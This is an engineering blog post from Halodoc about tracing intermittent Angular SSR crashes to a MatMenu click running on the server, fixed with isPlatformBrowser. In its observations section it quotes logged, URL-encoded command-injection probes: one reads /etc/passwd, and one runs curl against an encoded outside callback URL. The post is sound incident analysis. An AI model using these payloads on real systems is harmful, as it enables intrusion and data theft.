Diagnosing and Resolving Node Server Crashes in Angular SSR: A Comprehensive Case Study

node server crash Jun 28, 2024

In the world of web development, encountering server crashes is not uncommon. These crashes can disrupt the user experience and impact business operations. Recently, at Halodoc, we encountered one such issue where our website was crashing with Exit Code 1.

In this case study, we'll delve into the incident and explore the steps taken to diagnose and resolve the issue.

Background:

Our website, built with Angular, serves a large volume of customers daily. Recently, it experienced intermittent server crashes, leading to downtime and impacted the business. These crashes appeared to happen randomly and didn't follow any specific pattern. Sometimes, they occurred during peak traffic hours, while at other times, they seemed to happen unpredictably. It was difficult to predict, which made it challenging to pinpoint the root cause.

Diagnosis:

Exit Code: Exit codes in Node.js provide a standardised way to indicate the success or failure of a Node.js process when it terminates. This is what we used as our first clue. The server was crashing with Exit Code 1. This confirmed that the crash was happening due to an application issue and it was not some infra-related issue like CPU or memory threshold breach.

Refer to this doc for more details about exit codes.

Application Performance Monitoring: Since the application was crashing with Exit Code 1, we can say the CPU & memory shouldn't be an issue. But still, we looked at the resource consumption of the server before the crash. And yes, it looked normal.

Log Addition: Since the server was crashing randomly without any CPU or memory threshold breach, it led to a hypothesis that the issue could be happening on some pages only. And when those pages were hit by the users, the server was crashing. To prove this hypothesis, we added a custom log to print the request URL for all server requests.

server.get('*', (req, res, next) => {
  const {protocol, originalUrl, baseUrl, headers} = req;
  
  /** Additional log to print the request URL */
  console.log(`\n************* ${req.url} *************\n`);

  commonEngine
      .render({
        bootstrap,
        documentFilePath: indexHtml,
        url: `${protocol}://${headers.host}${originalUrl}`,
        publicPath: browserDistFolder,
        providers: [{provide: APP_BASE_HREF, useValue: req.baseUrl}],
      })
      .then((html) => res.send(html))
      .catch((err) => next(err));
});

The application was redeployed with the custom logging.

Observations:

In the server logs of the next crash, we mainly checked last 10-15 URLs, that were hit just before the server crashed. We saw these kinds of request URLs:

  • /rumah-sakit/tindakan-medis/radiologi-2?category_slug=FUZZ&tangerang=FUZZ&terdekat=%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd
  • /rumah-sakit/tindakan-medis/radiologi-2?category_slug=FUZZ&tangerang=FUZZ&terdekat=%20curl%20%20%24%28echo%20aHR0cHM6Ly9lbmh2Y3UxMnkwOWx0N3kubS5waXBlZHJlYW0ubmV0P3JjZT1ZWEpsY1QxeVRVRkNkRlJtSm1odmMzUTlkM2QzTG1oaGJHOWtiMk11WTI5dEpuQmhjbUZ0UFhSbGNtUmxhMkYwSm5CaGRHZzlKVEpHY25WdFlXZ3RjMkZyYVhRbE1rWjBhVzVrWVd0aGJpMXRaV1JwY3lVeVJuSmhaR2x2Ykc5bmFTMHlKblI1Y0dVOWNtTmxYMkpzYVc1a0puVjBZejB4TnpBNU56azVOREUw%20%7C%20base64%20-d%29
  • /rumah-sakit/tindakan-medis/radiologi-2?category=123&category_slug=123&checkcache=123&donotbackuprrd=123&m3utitle=123&mh=123&string=123&tangerang=123&terdekat=123&toProcess=123

The query parameters of these didn't look normal. In our application, we didn't have any use-case with such query parameters. It seemed that someone was trying to hit our website with malicious URLs. We tried to hit these URLs locally in SSR mode, and we saw the same error on the local server. The server was crashing with Exit Code 1.

After examining the code related to the aforementioned routes, we discovered that the application was crashing due to the following statement:

timer(10).subscribe(() => {
   this.suggestionSearchInput.nativeElement.click();
});

where suggestionSearchInput is a ViewChild.

In reality, it wasn't the click method that caused the issue, but rather the listener attached to this click event. The listener was supposed to open a list of items using MatMenu. However, the MatMenu component is not compatible with SSR as it accesses the DOM using document, which led to a ReferenceError: document is not defined on the server. This error was not caught by either the library or the application code.

Another point to note is that this click function was executed asynchronously using an RxJS timer. Upon removing the timer, the application did not crash. To understand this, let's look at the HTML code first.

<input
  [matMenuTriggerFor]="suggestionMenu"
  #suggestionSearchInput
/>

<mat-menu
  #suggestionMenu="matMenu"
  role="menu"
>
  ...
</mat-menu>

Here, the MatMenu is accessed as a template reference variable. Template reference variables in Angular are not immediately available in the lifecycle hooks before ngAfterViewInit. They are initialised and can be accessed only after the view has been fully initialised. In our case, the click was being performed in the ngOnInit lifecycle hook, which is before ngAfterViewInit.

For more details on Angular lifecycle hooks, please refer this.

So, when the click is executed synchronously, the MatMenu is not available. But in case the click is executed asynchronously, by the time the  click is performed, the template reference variable for MatMenu becomes available. Hence, it tries to open the menu, causing ReferenceError: document is not defined, which is not caught by either the library or the application code.

If an error occurs and is not properly handled, it can cause the Node.js process to crash with Exit code 1 by default when it propagates to the top level without being caught. Adding a handler for the uncaughtException event overrides this default behaviour. It is also possible to monitor uncaughtException events without overriding the default behaviour to exit the process by installing a uncaughtExceptionMonitor listener. The uncaughtExceptionMonitor event is emitted before an uncaughtException event is emitted.

For more details, please refer these docs on uncaughtException and error propagation & interception.

Resolution:

Since the issue was caused by attempting to fire the click event manually on the server, we implemented a solution to ensure that this logic only executed in the browser. This approach aligns with best practices for server-side rendering (SSR), which involve preventing certain actions that are intended for client-side execution only.


timer(10).subscribe(() => {
   if (isPlatformBrowser(this.platformId) {
      this.suggestionSearchInput.nativeElement.click();
   }
});

isPlatformBrowser is a function provided by the @angular/common library in Angular. It's used to check whether the current platform is a web browser environment or not.

The application was redeployed with the updated code, and subsequent monitoring showed no further occurrences of server crashes with Exit Code 1.

To mitigate similar issues in the future, we audited our application to ensure that only SSR compatible codes are executed during SSR load. We implemented guidelines to prevent certain executions in SSR environments:

  1. Direct DOM Manipulations: Avoid using methods like getElementById, querySelector, innerHTML, outerHTML, etc., which directly manipulate the DOM, as they can lead to inconsistencies between server-rendered and client-rendered content.
  2. Adding Event Listeners: Refrain from adding event listeners directly in SSR environments, as they may not behave as expected and can cause server crashes.
  3. Manually Firing Events: Avoid manually firing events like click, mouseover, scroll, etc., in SSR environments, as they can trigger unexpected behaviour and compromise server stability.
  4. Usage of Browser APIs: Exercise caution when using browser-specific APIs like window, document, navigator, localStorage, sessionStorage, etc., in SSR environments, as they may not be available or behave differently on the server.

By adhering to these guidelines and implementing checks to prevent SSR-specific executions, we ensure the consistency and reliability of our web applications across different environments.

Core Learnings:

  1. Environment-Specific Code Execution: Considering the execution context and environment-specific behaviour when writing code is crucial, especially in applications with server-side rendering capabilities. Implementing checks to ensure that code executes only in appropriate environments can prevent unexpected behaviour and server crashes.
  2. Thorough Log Analysis: Comprehensive log analysis is essential for identifying the root cause of server crashes. However, in cases where standard logs may not provide sufficient information, implementing custom logging can offer valuable insights into specific areas of the application. It can help with targeted investigation and enable us to pinpoint the root cause more efficiently.
  3. Hypothesis Testing and Iterative Diagnosis: Formulating hypotheses based on observed patterns and testing them through targeted interventions can help to narrow down the scope of investigation and focus on relevant areas of the application. Iterative diagnosis and hypothesis testing are essential strategies for effective troubleshooting.
  4. Defensive Programming: Incorporating defensive programming techniques, such as adding conditional checks, can help safeguard applications against unexpected behaviour and mitigate potential risks, ensuring the reliability and stability of web applications.

Conclusion:

Troubleshooting server crashes requires a systematic approach, including thorough log analysis, hypothesis testing, and targeted interventions. By applying these strategies and lessons learned, we were able to diagnose and resolve the server crash issue effectively, ensuring the continued stability and reliability of the website.

This experience underscores the importance of proactive monitoring, meticulous analysis, and strategic intervention in troubleshooting server crashes. By adopting a proactive approach to monitoring and maintenance, coupled with adherence to best practices in web development, we can minimise downtime, enhance user experience, and ensure the long-term stability and performance of the web applications.

As we continue to navigate the complexities of web development, let this case study serve as a reminder of the value of continuous improvement and vigilance in maintaining the reliability and resilience of our digital platforms.

Join us

Scalability, reliability, and maintainability are the three pillars that govern what we build at Halodoc Tech. We are actively looking for engineers at all levels, and if solving hard problems with challenging requirements is your forte, please reach out to us with your resume at careers.india@halodoc.com.

About Halodoc

Halodoc is the number 1 all around Healthcare application in Indonesia. Our mission is to simplify and bring quality healthcare across Indonesia, from Sabang to Merauke. We connect 20,000+ doctors with patients in need through our Tele-consultation service. We partner with 3500+ pharmacies in 100+ cities to bring medicine to your doorstep. We've also partnered with Indonesia's largest lab provider to provide lab home services, and to top it off we have recently launched a premium appointment service that partners with 500+ hospitals that allow patients to book a doctor appointment inside our application. We are extremely fortunate to be trusted by our investors, such as the Bill & Melinda Gates Foundation, Singtel, UOB Ventures, Allianz, GoJek, Astra, Temasek, and many more. We recently closed our Series D round and in total have raised around USD$100+ million for our mission. Our team works tirelessly to make sure that we create the best healthcare solution personalised for all of our patient's needs, and are continuously on a path to simplify healthcare for Indonesia.

Bivesh Kumar

Software Development Engineer III